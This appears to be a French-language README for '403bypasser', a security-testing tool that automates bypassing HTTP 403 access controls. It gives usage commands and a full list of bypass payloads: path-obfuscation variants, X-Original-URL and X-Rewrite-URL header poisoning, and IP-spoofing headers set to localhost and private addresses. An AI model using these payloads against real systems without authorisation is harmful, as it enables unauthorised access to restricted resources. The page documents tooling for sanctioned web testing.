
Automatise les techniques de contournement du contrôle d'accès HTTP 403 en utilisant la manipulation d'en-têtes, l'obscurcissement de chemin et la conversion de méthode HTTP pour les tests de sécurité des applications web.

403bypasser automatise les techniques utilisées pour contourner les restrictions de contrôle d'accès sur les pages cibles. Cet outil continue d'être amélioré et est ouvert aux contributions.
403bypasser automatise les techniques utilisées pour contourner les restrictions de contrôle d'accès sur les pages cibles. 403bypasser continuera d'être amélioré et est ouvert aux contributions.
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txtArguments :
| Argument | Description | Exemples | Remarque |
|---|---|---|---|
| -u | URL unique à scanner | http://example.com ou http://example.com/ | Tous ces exemples d'utilisation sont interprétés de la même manière |
| -U | chemin vers une liste d'URLs | ./urllist.txt, ../../urllist.txt, etc. | Fournissez simplement le chemin où se trouve le fichier :) |
| -d | répertoire unique à scanner | admin ou /admin ou admin/ ou /admin/ | Tous ces exemples d'utilisation sont interprétés de la même manière |
| -D | chemin vers une liste de répertoires | ./dirlist.txt, ../../dirlist.txt, etc. | Fournissez simplement le chemin où se trouve le fichier :) |
Utilisation 1 : python3 403bypasser.py -u https://example.com -d /secret
Utilisation 2 : python3 403bypasser.py -u https://example.com -D dirlist.txt
Utilisation 3 : python3 403bypasser.py -U urllist.txt -d /secret
Utilisation 4 : python3 403bypasser.py -U urllist.txt -D dirlist.txt
NOTE IMPORTANTE : Toutes les commandes suivantes sont interprétées de la même manière. Par conséquent, le motif que vous utilisez n'est qu'une question de préférence.
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secretComme Python est un langage multiplateforme, on peut exécuter ce programme sur différents systèmes d'exploitation.
La sortie du programme est sauvegardée (dans le répertoire actuel) dans un fichier portant le nom du domaine donné en entrée.
Par exemple :
python3 403bypasser.py -u https://example.com -d /secret est donné. Ensuite, la sortie est sauvegardée dans example.txt dans le répertoire actuel.
Changements dans v2.0 : Des changements considérables ont été apportés dans cette version. Le projet a été complètement migré de Bash vers Python 3. De nouvelles techniques variées ont été ajoutées.
Changements dans v1.1 : Il est désormais possible de passer des fichiers (listes) à 403bypasser en entrée via des arguments. De plus, deux autres cas de test ont été ajoutés : empoisonnement avec les en-têtes 1)X-Original-URL et 2)X-Rewrite-URL.
/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./X-Original-URL: /secretX-Rewrite-URL: /secretEn-têtes :
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IPValeurs :
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1